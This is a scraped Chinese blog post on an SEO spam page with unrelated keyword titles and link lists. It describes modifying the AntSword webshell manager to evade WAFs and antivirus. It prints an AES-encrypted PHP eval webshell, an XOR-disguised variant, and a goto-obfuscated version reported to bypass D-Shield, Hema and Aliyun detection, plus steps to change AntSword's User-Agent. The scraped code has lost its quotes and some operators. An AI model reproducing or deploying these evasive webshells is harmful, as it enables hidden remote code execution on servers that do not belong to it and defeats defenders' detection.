当前位置: 首页 > news >正文

东莞建网站的公司电影微网站开发

东莞建网站的公司,电影微网站开发,新浪网页版入口,购物商城网站都有哪些功能0x00 前言#xff1a; 为什么会有改造蚁剑的想法#xff0c;之前看到有做冰蝎的流量加密#xff0c;来看到绕过waf#xff0c;改造一些弱特征#xff0c;通过流量转换#xff0c;跳过密钥交互。 但是#xff0c;冰蝎需要反编译去改造源码#xff0c;再进行修复bug 为什么会有改造蚁剑的想法之前看到有做冰蝎的流量加密来看到绕过waf改造一些弱特征通过流量转换跳过密钥交互。 但是冰蝎需要反编译去改造源码再进行修复bug也比较复杂。而AntSword相对于冰蝎来说不限制webshell即一句话也可以进行连接还可以自定义编码器和解码器可以很容易让流量做到混淆。 0x01 蚁剑介绍及其改编 关于蚁剑的介绍这里就不多说了一个连接webshell的管理器使用前端nodejs进行编码。AntSword给我最大的好处是可以连接一句话木马而且可以自定义编码器和解码器。这让我们就有了很多种webshell的变换。 但是蚁剑默认的编码器和菜刀都是一样的这里用burpsuite来进行抓包看下流量。 蚁剑默认流量 返回来的是默认蚁剑的默认流量所以的话这里就基本上过不去态势感知和waf所以很容易想到了编码器和解码器的选择可以进行流量的改造来进行waf的绕过先选用最默认的base64进行测试。 默认的base64编码器 但是看到了使用base64编码之后是有eval字样的这样的话肯定被态势感知和全流量一体机来进行特征的抓取肯定会报威胁。 去github上找到蚁剑的编码器和对应的解码器 github地址https://github.com/AntSwordProject/AwesomeEncoder/tree/master/php这里下载默认的aes-128的默认流量。 这里进行流量抓取。里面自带了php的webshell。 ?php session_start(); $pwdant; $keysubstr(str_pad(session_id(),16,a),0,16); eval(openssl_decrypt(base64_decode($_POST[$pwd]), AES-128-ECB, $key, OPENSSL_RAW_DATA|OPENSSL_ZERO_PADDING)); ?默认webshell讲解 这里打开session_start然后截取Cookie中的PHPSESSION的16位。 然后进行aes加密密码为pwd再D盾河马和阿里云进行扫描 河马没有查出来可能是比较弱 阿里云直接报恶意 初步修改后的webshell 这里先做代码修改直接放出我修改之后的webshell代码。 ?php session_start(); error_reporting(E_ALL^E_NOTICE^E_WARNING); function decode($key,$data){ $data_new  ; for($i0;$istrlen($data);$i){ $b$data[$i]^$key; $data_new  $data_new.urldecode($b); } define(ass,$data_new[0].strrev($data_new)[2].strrev($data_new)[2].$data_new[11].strrev($data_new)[4].strrev($data_new)[0]); define(ev,$data_new[11].strrev($data_new)[8].$data_new[0].strrev($data_new)[6].($result)); return $data_new; } function decrypto($key,$data){ $data  base64_decode($data); $result  openssl_decrypt($data, AES-128-ECB, $key, OPENSSL_RAW_DATA|OPENSSL_ZERO_PADDING); decode(\\,:omn?o8h9i:j;k*d0e.l/m(); $assass; $ass(ev); } class run{public $data;public function __construct(){ $this-data  ##.$_POST[1].###; $this-data  $this-data.123456; } } $keysubstr(str_pad(session_id(),16,a),0,16); $run  new run(); decrypto($key,$run-data); ?这里能过去D盾的静态但是无法绕过阿里云查杀。 所以这里还需要进行代码混淆。这也是之后webshell免杀常常用到的 混淆之后的webshell 这里提供php在线加密的站 https://enphp.djunny.com/这里加密之后生成webshell。如下 ?phpgoto Zc4oD; UJih6: function decrypto($key, $data) { goto LBrqg; P6YrI: $ass  ass; goto aR6yN; svn0O: $result  openssl_decrypt($data, \x41\x45\x53\x2d\x31\x32\70\55\105\x43\x42, $key, OPENSSL_RAW_DATA | OPENSSL_ZERO_PADDING); goto ATbMy; LBrqg: $data  base64_decode($data); goto svn0O; ATbMy: decode(\x5c, \75\72\x3d\157\x6d\x3e\x6e\x3f\x6f\x38\x68\71\151\x3a\x6a\x3b\x6b\x2a\x64\x30\x65\56\x6c\57\155\50); goto P6YrI; aR6yN: $ass(ev); goto k6RVH; k6RVH: } goto DGZMG; WvjFi: ini_set(\144\151\x73\160\x6c\x61\x79\x5f\145\162\x72\x6f\162\x73, \117\146\x66); goto Wguwk; DGZMG: class run { public $data; public function __construct() { $this-data  \43\140\x60\140\140\x60\140\x60\x60\43 . $_POST[1] . \x23\140\x23\140\43; } } goto Berxy; UUYvT: $run  new run(); goto apKNY; Berxy: $key  substr(str_pad(session_id(), 16, \141), 0, 16); goto UUYvT; Zc4oD: session_start(); goto WvjFi; Wguwk: function decode($key, $data) { goto LGJR3; Ef77S: $i  0; goto KvZGg; rSTXM: define(\141\x73\x73, $data_new[0] . strrev($data_new)[2] . strrev($data_new)[2] . $data_new[11] . strrev($data_new)[4] . strrev($data_new)[0]); goto TQ6r4; Tbglr: return $data_new; goto FsE2S; tm2qt: goto I39OV; goto eF7jG; AqTZZ: $data_new  $data_new . urldecode($b); goto FriN_; TQ6r4: define(\x65\166, $data_new[11] . strrev($data_new)[8] . $data_new[0] . strrev($data_new)[6] . \50\x24\x72\145\163\165\154\x74\51); goto Tbglr; FriN_: bLexq: goto gITff; eF7jG: RuTl1: goto rSTXM; gITff: $i; goto tm2qt; KdSCg: if (!($i  strlen($data))) { goto RuTl1; } goto d9N4J; d9N4J: $b  $data[$i] ^ $key; goto AqTZZ; LGJR3: $data_new  ; goto Ef77S; KvZGg: I39OV: goto KdSCg; FsE2S: } goto UJih6; apKNY: decrypto($key, $run-data);经过加密之后可以发现进行了goto的混淆所以这里就达到了代码混淆。因为之前绕过了D盾和河马这里直接去阿里云查杀。 已经成功绕过阿里云查杀。用burpsuite抓下流量特征。 从流量加密来分析的话已经能绕过态势感知和全流量分析机。 0x02 蚁剑UA头的修改 在burp的数据包中能清楚的看到蚁剑的特征 在目录/modules/request.js文件中修改UA头 /modules/update.js文件修改 0x03 总结 关于免杀来说通常是进行代码加密混淆特征码替换或者分割传输等情况。之前有想写过shellcode免杀但是还没有过windows defender所以就推迟一段时间来写。感谢各位拜读。 Tip这个马目前已经过不了阿里了已经被阿里抓特征了。但是整体思路没有改变所以大家可以自己去发挥思路去整合。
http://www.dnsts.com.cn/news/37369.html

相关文章:

  • 如何利用国外分类网站开发客户网站订单模板
  • wordpress有声主题安徽百度关键词优化
  • wordpress回收站在哪里城市建设者官方网站
  • 大连开发区网站建设卖游戏币网站制作
  • 南京城乡建设局网站为什么选择当网站设计人员
  • 做网站什么语言最好网站界面的版式架构
  • 宁波市网站建设公司信誉好的丹阳网站建设
  • 做网站需要编程吗江门网站建设定制
  • 一个网站建立团队大概要多少钱做网站建设涉及哪些算法
  • 做淘宝那样的网站要多少钱电脑培训网上免费课程
  • 中山网站建设文化流程有没有什么网站免费做名片
  • 怎样帮拍卖网站做策划免费咨询更多详情
  • 关于微网站策划ppt怎么做做win精简系统的网站
  • led的网站建设做网站需要准备哪些东西
  • 曲靖做网站公司Wordpress刷新CDN缓存
  • 中文企业展示网站模板wordpress 亲子博客
  • 怎么样做贷款网站湖北网站建设营销qq
  • 免费公司网站制作潍坊市住房和城乡建设厅网站
  • 网站作品网络运营培训班多少钱
  • 旅游网站的功能设计机加工接单什么平台好
  • 没有域名能做网站吗网站seo搜索
  • 西安网站建设公司西安网络公司怎么备份wordpress
  • 网站建设 服务内容建网站自己与租云服务器哪个好
  • 亦庄公司做网站嵌入式开发用什么软件
  • 网站建设站长哈尔滨房地产网站建设
  • 网站制作设计正规公司北京网站模仿
  • 手机上网站用建设工具电商知识网
  • 陕西富国建设工程有限公司网站企业网站404页面设计
  • 摄影网站建设任务书广东建设职业技术学院网站
  • 承德市隆化城乡建设局网站东莞免费做网站公司